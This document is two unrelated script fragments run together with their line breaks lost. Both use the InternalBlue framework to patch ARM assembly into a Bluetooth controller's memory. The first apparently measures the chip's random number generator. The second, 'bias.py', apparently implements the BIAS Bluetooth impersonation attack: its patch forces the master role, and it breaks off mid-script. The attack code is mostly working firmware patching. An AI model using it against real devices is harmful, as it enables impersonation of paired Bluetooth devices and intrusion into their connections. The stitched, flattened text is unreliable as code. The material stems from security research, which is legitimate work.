add r0, 2 // buffer starts at 2 with data (?) ldr r1, =0x444e4152 // RAND str r1, [r0] add r0, 4 // advance buffer by 4 // send hci event mov r0, r4 // back to buffer at offset 0 pop {r0-r4, lr} b 0x268E // send_hci_event_without_free() """ % (MEM_ROUNDS, MEM_RNG) internalblue = HCICore() internalblue.interface = internalblue.device_list()[0][ 1] # just use the first device # setup sockets if not internalblue.connect(): internalblue.logger.critical("No connection to target device.") exit(-1) internalblue.logger.info("installing assembly patches...") # Install the RNG code in RAM code = asm(ASM_SNIPPET_RNG, vma=ASM_LOCATION_RNG) if not internalblue.writeMem( address=ASM_LOCATION_RNG, data=code, progress_log=None): internalblue.logger.critical("error!") exit(-1)
# bias.py """ Use it with internalblue """ #!/usr/bin/python2 from pwn import * from internalblue.hcicore import HCICore internalblue = HCICore() internalblue.interface = internalblue.device_list()[0][1] # setup sockets if not internalblue.connect(): log.critical("No connection to target device.") exit(-1) log.info("BEGIN patchrom.") # patch1: make sure we always switch to master role code1 = b""" @Part 1: Make sure we always switch roles mov r6, #0x0 sub sp, #0x18 add r0, #0xc b 0x2e7ad """ addrcode1 = 0x2006d0 taddrcode1 = addrcode1 + 1 # 0x2006d1 # write code1 into addrcode1 (SRAM)